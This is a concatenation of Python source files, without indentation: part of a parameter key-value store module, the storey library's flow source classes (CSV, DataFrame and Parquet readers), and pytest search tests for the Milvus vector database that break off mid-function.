# create the database if it doesn't exist...
if not os.path.exists(self.db+"/d"):
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
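# Usage sketch for non-blocking writes (hypothetical value):
#
#   t = put_nonblocking("DongleId", "0123456789abcdef")
#   ...  # continue time-sensitive work while the write happens on a background thread
#   t.join()  # optionally wait for the write to finish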
if __name__ == "__main__":
params = Params()
if len(sys.argv) > 2:
params.put(sys.argv[1], sys.argv[2])
else:
for k in keys:
pp = params.get(k)
if pp is None:
print("%s is None" % k)
elif all(32 <= c < 128 for c in pp):
print("%s = %s" % (k, pp.decode("ascii")))
else:
print("%s = %s" % (k, pp.hex()))
# Test multiprocess:
# seq 0 100000 | xargs -P20 -I{} python common/params.py DongleId {} && sleep 0.05
# while python common/params.py DongleId; do sleep 0.05; done
|
sources.py
|
import asyncio
import copy
import csv
import math
import queue
import threading
import uuid
import warnings
from datetime import datetime
from typing import List, Optional, Union, Callable, Coroutine, Iterable
import pyarrow.parquet as pq
import pandas
import pytz
from .dtypes import _termination_obj, Event, legal_time_units
from .flow import Flow, Complete
from .utils import url_to_file_system, drop_reserved_columns, find_filters
class AwaitableResult:
"""Future result of a computation. Calling await_result() will return with the result once the computation is completed."""
def __init__(self, on_error: Optional[Callable[[], None]] = None):
self._on_error = on_error
self._q = queue.Queue(1)
self._completed = False
def await_result(self):
"""Returns the result, once the computation is completed"""
result = self._q.get()
if isinstance(result, BaseException):
if self._on_error:
self._on_error()
raise result
return result
def _set_result(self, element):
if not self._completed:
self._completed = True
self._q.put(element)
def _set_error(self, ex):
self._set_result(ex)
def _convert_to_datetime(obj, time_format: Optional[str] = None):
if isinstance(obj, datetime):
return obj
elif isinstance(obj, float) or isinstance(obj, int):
return datetime.fromtimestamp(obj, tz=pytz.utc)
elif isinstance(obj, str):
if time_format is None:
return datetime.fromisoformat(obj)
else:
return datetime.strptime(obj, time_format)
else:
raise ValueError(f"Could not parse '{obj}' (of type {type(obj)}) as a time.")
class FlowControllerBase:
def __init__(self, key_field: Optional[Union[str, List[str]]], time_field: Optional[str], time_format: Optional[str]):
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._current_uuid_base = None
self._current_uuid_count = 0
def _get_uuid(self):
if not self._current_uuid_base or self._current_uuid_count == 1024:
self._current_uuid_base = uuid.uuid4().hex
self._current_uuid_count = 0
result = f'{self._current_uuid_base}-{self._current_uuid_count:04}'
self._current_uuid_count += 1
return result
def _build_event(self, element, key, event_time):
body = element
element_is_event = hasattr(element, 'id')
if element_is_event:
body = element.body
if not key and self._key_field:
if isinstance(self._key_field, str):
key = body[self._key_field]
else:
key = []
for field in self._key_field:
key.append(body[field])
if not event_time and self._time_field:
event_time = _convert_to_datetime(body[self._time_field], self._time_format)
body[self._time_field] = event_time
if element_is_event:
if key:
element.key = key
if event_time:
element.time = event_time
return element
else:
return Event(body, id=self._get_uuid(), key=key, time=event_time)
class FlowController(FlowControllerBase):
"""Used to emit events into the associated flow, terminate the flow, and await the flow's termination.
To be used from a synchronous context.
"""
def __init__(self, emit_fn, await_termination_fn, return_awaitable_result, key_field: Optional[str] = None,
time_field: Optional[str] = None, time_format: Optional[str] = None):
super().__init__(key_field, time_field, time_format)
self._emit_fn = emit_fn
self._await_termination_fn = await_termination_fn
self._return_awaitable_result = return_awaitable_result
def emit(self, element: object, key: Optional[Union[str, List[str]]] = None, event_time: Optional[datetime] = None,
return_awaitable_result: Optional[bool] = None):
"""Emits an event into the associated flow.
:param element: The event data, or payload. To set metadata as well, pass an Event object.
:param key: The event key(s) (optional)
:param event_time: The event time (defaults to the current time, UTC).
:param return_awaitable_result: Deprecated. An awaitable result object will be returned if a Complete step appears in the flow.
:returns: AwaitableResult if a Complete step appears in the flow. None otherwise.
"""
if return_awaitable_result is not None:
warnings.warn('return_awaitable_result is deprecated. An awaitable result object will be returned if a Complete step appears '
'in the flow.',
DeprecationWarning)
event = self._build_event(element, key, event_time)
awaitable_result = None
if self._return_awaitable_result:
awaitable_result = AwaitableResult(self.terminate)
event._awaitable_result = awaitable_result
self._emit_fn(event)
return awaitable_result
def terminate(self):
"""Terminates the associated flow."""
self._emit_fn(_termination_obj)
def await_termination(self):
"""Awaits the termination of the flow. To be called after terminate. Returns the termination result of the flow (if any)."""
return self._await_termination_fn()
class FlowAwaiter:
"""Future termination result of a flow. Calling await_termination() will wait for the flow to terminate and return its
termination result."""
def __init__(self, await_termination_fn):
self._await_termination_fn = await_termination_fn
def await_termination(self):
""""waits for the flow to terminate and returns the result"""
return self._await_termination_fn()
class SyncEmitSource(Flow):
"""Synchronous entry point into a flow. Produces a FlowController when run, for use from inside a synchronous context. See AsyncEmitSource
for use from inside an async context.
:param buffer_size: size of the incoming event buffer. Defaults to 1024.
:param key_field: Field to extract and use as the key. Optional.
:param time_field: Field to extract and use as the time. Optional.
:param time_format: Format of the event time. Needed when a nonstandard string timestamp is used (i.e. not ISO or epoch). Optional.
:param name: Name of this step, as it should appear in logs. Defaults to class name (SyncEmitSource).
:type name: string
for additional params, see documentation of :class:`storey.flow.Flow`
"""
_legal_first_step = True
def __init__(self, buffer_size: Optional[int] = None, key_field: Union[list, str, None] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None, **kwargs):
if buffer_size is None:
buffer_size = 1024
else:
kwargs['buffer_size'] = buffer_size
if key_field is not None:
kwargs['key_field'] = key_field
super().__init__(**kwargs)
if buffer_size <= 0:
raise ValueError('Buffer size must be positive')
self._q = queue.Queue(buffer_size)
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._termination_q = queue.Queue(1)
self._ex = None
self._closeables = []
async def _run_loop(self):
loop = asyncio.get_running_loop()
self._termination_future = asyncio.get_running_loop().create_future()
while True:
event = await loop.run_in_executor(None, self._q.get)
try:
termination_result = await self._do_downstream(event)
if event is _termination_obj:
self._termination_future.set_result(termination_result)
except BaseException as ex:
if event is not _termination_obj and event._awaitable_result:
event._awaitable_result._set_error(ex)
self._ex = ex
if not self._q.empty():
event = self._q.get()
if event is not _termination_obj and event._awaitable_result:
event._awaitable_result._set_error(ex)
self._termination_future.set_result(None)
break
if event is _termination_obj:
break
for closeable in self._closeables:
await closeable.close()
def _loop_thread_main(self):
asyncio.run(self._run_loop())
self._termination_q.put(self._ex)
def _raise_on_error(self, ex):
if ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
def _emit(self, event):
if event is not _termination_obj:
self._raise_on_error(self._ex)
self._q.put(event)
if event is not _termination_obj:
self._raise_on_error(self._ex)
def run(self):
"""Starts the flow"""
self._closeables = super().run()
thread = threading.Thread(target=self._loop_thread_main)
thread.start()
def raise_error_or_return_termination_result():
self._raise_on_error(self._termination_q.get())
return self._termination_future.result()
has_complete = self._check_step_in_flow(Complete)
return FlowController(self._emit, raise_error_or_return_termination_result, has_complete, self._key_field, self._time_field,
self._time_format)
class AsyncAwaitableResult:
"""Future result of a computation. Calling await_result() will return with the result once the computation is completed.
Same as AwaitableResult but for an async context."""
def __init__(self, on_error: Optional[Callable[[BaseException], Coroutine]] = None):
self._on_error = on_error
self._q = asyncio.Queue(1)
self._completed = False
async def await_result(self):
"""returns the result of the computation, once the computation is complete"""
result = await self._q.get()
if isinstance(result, BaseException):
if self._on_error:
await self._on_error()
raise result
return result
async def _set_result(self, element):
if not self._completed:
self._completed = True
await self._q.put(element)
async def _set_error(self, ex):
await self._set_result(ex)
class AsyncFlowController(FlowControllerBase):
"""
Used to emit events into the associated flow, terminate the flow, and await the flow's termination. To be used from inside an async def.
"""
def __init__(self, emit_fn, loop_task, await_result, key_field: Optional[str] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None):
super().__init__(key_field, time_field, time_format)
self._emit_fn = emit_fn
self._loop_task = loop_task
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._await_result = await_result
async def emit(self, element: object, key: Optional[Union[str, List[str]]] = None, event_time: Optional[datetime] = None,
await_result: Optional[bool] = None) -> object:
"""Emits an event into the associated flow.
:param element: The event data, or payload. To set metadata as well, pass an Event object.
:param key: The event key(s) (optional)
:param event_time: The event time (defaults to the current time, UTC).
:param await_result: Deprecated. Will await a result if a Complete step appears in the flow.
:returns: The result received from the flow if a Complete step appears in the flow. None otherwise.
"""
if await_result is not None:
warnings.warn('await_result is deprecated. An awaitable result object will be returned if a Complete step appears '
'in the flow.',
DeprecationWarning)
event = self._build_event(element, key, event_time)
awaitable = None
if self._await_result:
awaitable = AsyncAwaitableResult(self.terminate)
event._awaitable_result = awaitable
await self._emit_fn(event)
if self._await_result:
result = await awaitable.await_result()
if isinstance(result, BaseException):
raise result
return result
async def terminate(self):
"""Terminates the associated flow."""
await self._emit_fn(_termination_obj)
async def await_termination(self):
"""Awaits the termination of the flow. To be called after terminate. Returns the termination result of the flow (if any)."""
return await self._loop_task
class AsyncEmitSource(Flow):
"""
Asynchronous entry point into a flow. Produces an AsyncFlowController when run, for use from inside an async def.
See SyncEmitSource for use from inside a synchronous context.
:param buffer_size: size of the incoming event buffer. Defaults to 1024.
:param name: Name of this step, as it should appear in logs. Defaults to class name (AsyncEmitSource).
:type name: string
:param time_field: Field to extract and use as the time. Optional.
:param time_format: Format of the event time. Needed when a nonstandard string timestamp is used (i.e. not ISO or epoch). Optional.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
_legal_first_step = True
def __init__(self, buffer_size: int = 1024, key_field: Union[list, str, None] = None, time_field: Optional[str] = None,
time_format: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if buffer_size <= 0:
raise ValueError('Buffer size must be positive')
self._q = asyncio.Queue(buffer_size)
self._key_field = key_field
self._time_field = time_field
self._time_format = time_format
self._ex = None
self._closeables = []
async def _run_loop(self):
while True:
event = await self._q.get()
try:
termination_result = await self._do_downstream(event)
if event is _termination_obj:
return termination_result
except BaseException as ex:
self._ex = ex
if event is not _termination_obj and event._awaitable_result:
awaitable = event._awaitable_result._set_error(ex)
if awaitable:
await awaitable
if not self._q.empty():
await self._q.get()
self._raise_on_error()
finally:
if event is _termination_obj or self._ex:
for closeable in self._closeables:
await closeable.close()
def _raise_on_error(self):
if self._ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
async def _emit(self, event):
if event is not _termination_obj:
self._raise_on_error()
await self._q.put(event)
if event is not _termination_obj:
self._raise_on_error()
async def run(self):
"""Starts the flow"""
self._closeables = super().run()
loop_task = asyncio.get_running_loop().create_task(self._run_loop())
has_complete = self._check_step_in_flow(Complete)
return AsyncFlowController(self._emit, loop_task, has_complete, self._key_field, self._time_field, self._time_format)
class _IterableSource(Flow):
_legal_first_step = True
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._termination_q = queue.Queue(1)
self._ex = None
self._closeables = []
def _init(self):
pass
async def _run_loop(self):
raise NotImplementedError()
async def _async_loop_thread_main(self):
try:
self._termination_future = asyncio.get_running_loop().create_future()
termination_result = await self._run_loop()
self._termination_future.set_result(termination_result)
except BaseException as ex:
self._ex = ex
self._termination_future.set_result(None)
finally:
for closeable in self._closeables:
await closeable.close()
def _loop_thread_main(self):
asyncio.run(self._async_loop_thread_main())
self._termination_q.put(self._ex)
def _raise_on_error(self, ex):
if ex:
if self.verbose:
raise type(self._ex)('Flow execution terminated') from self._ex
raise self._ex
def run(self):
self._closeables = super().run()
self._init()
thread = threading.Thread(target=self._loop_thread_main)
thread.start()
def raise_error_or_return_termination_result():
self._raise_on_error(self._termination_q.get())
return self._termination_future.result()
return FlowAwaiter(raise_error_or_return_termination_result)
async def run_async(self):
self._closeables = super().run()
return await self._run_loop()
class CSVSource(_IterableSource):
"""
Reads CSV files as input source for a flow.
:parameter paths: paths to CSV files
:parameter header: whether CSV files have a header or not. Defaults to False.
:parameter build_dict: whether to format each record produced from the input file as a dictionary (as opposed to a list).
Defaults to False.
:parameter key_field: the CSV field to be used as the key for events. May be an int (field index) or string (field name) if
header is True. Defaults to None (no key). Can be a list of keys.
:parameter time_field: the CSV field to be parsed as the timestamp for events. May be an int (field index) or string (field name)
if header is True. Defaults to None (no timestamp field).
:parameter timestamp_format: timestamp format as defined in datetime.strptime(). Defaults to ISO-8601 as defined in
datetime.fromisoformat().
:parameter type_inference: Whether to infer data types from the data (when True), or read all fields in as strings (when False).
Defaults to True.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
def __init__(self, paths: Union[List[str], str], header: bool = False, build_dict: bool = False,
key_field: Union[int, str, List[int], List[str], None] = None, time_field: Union[int, str, None] = None,
timestamp_format: Optional[str] = None, type_inference: bool = True, **kwargs):
kwargs['paths'] = paths
kwargs['header'] = header
kwargs['build_dict'] = build_dict
if key_field is not None:
kwargs['key_field'] = key_field
if time_field is not None:
kwargs['time_field'] = time_field
if timestamp_format is not None:
kwargs['timestamp_format'] = timestamp_format
kwargs['type_inference'] = type_inference
super().__init__(**kwargs)
if isinstance(paths, str):
paths = [paths]
self._paths = paths
self._with_header = header
self._build_dict = build_dict
self._key_field = key_field
self._time_field = time_field
self._timestamp_format = timestamp_format
self._type_inference = type_inference
self._storage_options = kwargs.get('storage_options')
if not header and isinstance(key_field, str):
raise ValueError('key_field can only be set to an integer when header is False')
if not header and isinstance(time_field, str):
raise ValueError('time_field can only be set to an integer when header is False')
def _init(self):
self._event_buffer = queue.Queue(1024)
self._types = []
self._none_columns = set()
def _infer_type(self, value):
lowercase = value.lower()
if lowercase == 'true' or lowercase == 'false':
return 'b'
try:
self._datetime_from_timestamp(value)
return 't'
except ValueError:
pass
try:
int(value)
return 'i'
except ValueError:
pass
try:
float(value)
return 'f'
except ValueError:
pass
if value == '':
return 'n'
return 's'
def _parse_field(self, field, index):
typ = self._types[index]
if typ == 's':
return field
if typ == 'f':
return float(field) if field != '' else math.nan
if typ == 'i':
return int(field) if field != '' else math.nan
if typ == 'b':
lowercase = field.lower()
if lowercase == 'true':
return True
if lowercase == 'false':
return False
if lowercase == '':
return None
raise TypeError(f'Expected boolean, got {field}')
if typ == 't':
if field == '':
return None
return self._datetime_from_timestamp(field)
if typ == 'n':
return None
raise TypeError(f'Unknown type: {typ}')
def _datetime_from_timestamp(self, timestamp):
if self._timestamp_format:
return pandas.to_datetime(timestamp, format=self._timestamp_format).floor('u').to_pydatetime()
else:
return datetime.fromisoformat(timestamp)
def _blocking_io_loop(self):
try:
for path in self._paths:
fs, file_path = url_to_file_system(path, self._storage_options)
with fs.open(file_path, mode='r') as f:
header = None
field_name_to_index = None
if self._with_header:
line = f.readline()
header = next(csv.reader([line]))
field_name_to_index = {}
for i in range(len(header)):
field_name_to_index[header[i]] = i
for line in f:
parsed_line = next(csv.reader([line]))
if self._type_inference:
if not self._types:
for index, field in enumerate(parsed_line):
type_field = self._infer_type(field)
self._types.append(type_field)
if type_field == 'n':
self._none_columns.add(index)
else:
for index in copy.copy(self._none_columns):
type_field = self._infer_type(parsed_line[index])
if type_field != 'n':
self._types[index] = type_field
self._none_columns.remove(index)
for i in range(len(parsed_line)):
parsed_line[i] = self._parse_field(parsed_line[i], i)
element = parsed_line
key = None
if header:
if len(parsed_line) != len(header):
raise ValueError(
f'CSV line with {len(parsed_line)} fields did not match header with {len(header)} fields')
if self._build_dict:
element = {}
for i in range(len(parsed_line)):
element[header[i]] = parsed_line[i]
if self._key_field:
if isinstance(self._key_field, list):
key = []
for single_key_field in self._key_field:
if self._with_header and isinstance(single_key_field, str):
single_key_field = field_name_to_index[single_key_field]
key.append(parsed_line[single_key_field])
else:
key_field = self._key_field
if self._with_header and isinstance(key_field, str):
key_field = field_name_to_index[key_field]
key = parsed_line[key_field]
if self._time_field:
time_field = self._time_field
if self._with_header and isinstance(time_field, str):
time_field = field_name_to_index[time_field]
time_as_datetime = parsed_line[time_field]
else:
time_as_datetime = datetime.now()
self._event_buffer.put(Event(element, key=key, time=time_as_datetime))
except BaseException as ex:
self._event_buffer.put(ex)
self._event_buffer.put(_termination_obj)
def _get_event(self):
event = self._event_buffer.get()
if isinstance(event, BaseException):
raise event
return event
async def _run_loop(self):
asyncio.get_running_loop().run_in_executor(None, self._blocking_io_loop)
def get_multiple():
events = [self._get_event()]
while not self._event_buffer.empty() and len(events) < 128:
events.append(self._get_event())
return events
while True:
events = await asyncio.get_running_loop().run_in_executor(None, get_multiple)
for event in events:
res = await self._do_downstream(event)
if event is _termination_obj:
return res
class DataframeSource(_IterableSource):
"""Use pandas dataframe as input source for a flow.
:param dfs: A pandas dataframe, or dataframes, to be used as input source for the flow.
:param key_field: column to be used as key for events. can be list of columns
:param time_field: column to be used as time for events.
:param id_field: column to be used as ID for events.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
def __init__(self, dfs: Union[pandas.DataFrame, Iterable[pandas.DataFrame]], key_field: Optional[Union[str, List[str]]] = None,
time_field: Optional[str] = None, id_field: Optional[str] = None, **kwargs):
if key_field is not None:
kwargs['key_field'] = key_field
if time_field is not None:
kwargs['time_field'] = time_field
if id_field is not None:
kwargs['id_field'] = id_field
super().__init__(**kwargs)
if isinstance(dfs, pandas.DataFrame):
dfs = [dfs]
self._dfs = dfs
self._key_field = key_field
self._time_field = time_field
self._id_field = id_field
async def _run_loop(self):
for df in self._dfs:
for namedtuple in df.itertuples():
body = namedtuple._asdict()
index = body.pop('Index')
if len(df.index.names) > 1:
for i, index_column in enumerate(df.index.names):
body[index_column] = index[i]
elif df.index.names[0] is not None:
body[df.index.names[0]] = index
key = None
if self._key_field:
if isinstance(self._key_field, list):
key = []
for key_field in self._key_field:
key.append(body[key_field])
else:
key = body[self._key_field]
time = None
if self._time_field:
time = body[self._time_field]
id = None
if self._id_field:
id = body[self._id_field]
event = Event(body, key=key, time=time, id=id)
await self._do_downstream(event)
return await self._do_downstream(_termination_obj)
class ParquetSource(DataframeSource):
"""Reads Parquet files as input source for a flow.
:parameter paths: paths to Parquet files
:parameter columns: list, default=None. If not None, only these columns will be read from the file.
:parameter start_filter: datetime. If not None, the results will be filtered by partitions and 'filter_column' >= start_filter.
Default is None.
:parameter end_filter: datetime. If not None, the results will be filtered by partitions and 'filter_column' < end_filter.
Default is None.
:parameter filter_column: Optional. If not None, the results will be filtered by this column according to the given start and/or end filters.
"""
def __init__(self, paths: Union[str, Iterable[str]], columns=None, start_filter: Optional[datetime] = None,
end_filter: Optional[datetime] = None, filter_column: Optional[str] = None, **kwargs):
if end_filter or start_filter:
start_filter = datetime.min if start_filter is None else start_filter
end_filter = datetime.max if end_filter is None else end_filter
if filter_column is None:
raise TypeError('Filter column is required when passing start/end filters')
self._paths = paths
if isinstance(paths, str):
self._paths = [paths]
self._columns = columns
self._start_filter = start_filter
self._end_filter = end_filter
self._filter_column = filter_column
self._storage_options = kwargs.get('storage_options')
super().__init__([], **kwargs)
def _read_filtered_parquet(self, path):
fs, file_path = url_to_file_system(path, self._storage_options)
dataset = pq.ParquetDataset(path, filesystem=fs)
if dataset.partitions:
partitions = dataset.partitions.partition_names
partitions_time_attributes = [j for j in legal_time_units if j in partitions]
else:
partitions_time_attributes = []
filters = []
find_filters(partitions_time_attributes, self._start_filter, self._end_filter, filters, self._filter_column)
return pandas.read_parquet(path, columns=self._columns, filters=filters,
storage_options=self._storage_options)
def _init(self):
self._dfs = []
for path in self._paths:
if self._start_filter or self._end_filter:
df = self._read_filtered_parquet(path)
else:
df = pandas.read_parquet(path, columns=self._columns, storage_options=self._storage_options)
drop_reserved_columns(df)
self._dfs.append(df)
|
test_search.py
|
import time
import pdb
import copy
import threading
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from milvus import DataType
from utils import *
dim = 128
segment_row_count = 5000
top_k_limit = 2048
collection_id = "search"
tag = "1970-01-01"
insert_interval_time = 1.5
nb = 6000
top_k = 10
nq = 1
nprobe = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_fields = gen_default_fields()
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
raw_vector, binary_entity = gen_binary_entities(1)
entities = gen_entities(nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, top_k, nq)
def init_data(connect, collection, nb=6000, partition_tags=None, auto_id=True):
'''
Generate entities and add them to the collection
'''
global entities
if nb == 6000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_tags is None:
if auto_id:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)])
else:
if auto_id:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)], partition_tag=partition_tags)
connect.flush([collection])
return insert_entities, ids
def init_binary_data(connect, collection, nb=6000, insert=True, partition_tags=None):
'''
Generate entities and add them to the collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 6000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_tags is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
else:
pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10, 2049]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= top_k_limit:
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= top_k_limit:
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO:
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=search_metric_type,
search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
@pytest.mark.level(2)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[tag])
assert len(res) == nq
@pytest.mark.level(2)
def test_search_index_partition_B(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
for tags in [[tag], [tag, "new_tag"]]:
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=tags)
else:
res = connect.search(collection, query, partition_tags=tags)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_C(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=["new_tag"])
else:
res = connect.search(collection, query, partition_tags=["new_tag"])
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search function, all the search params are correct, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
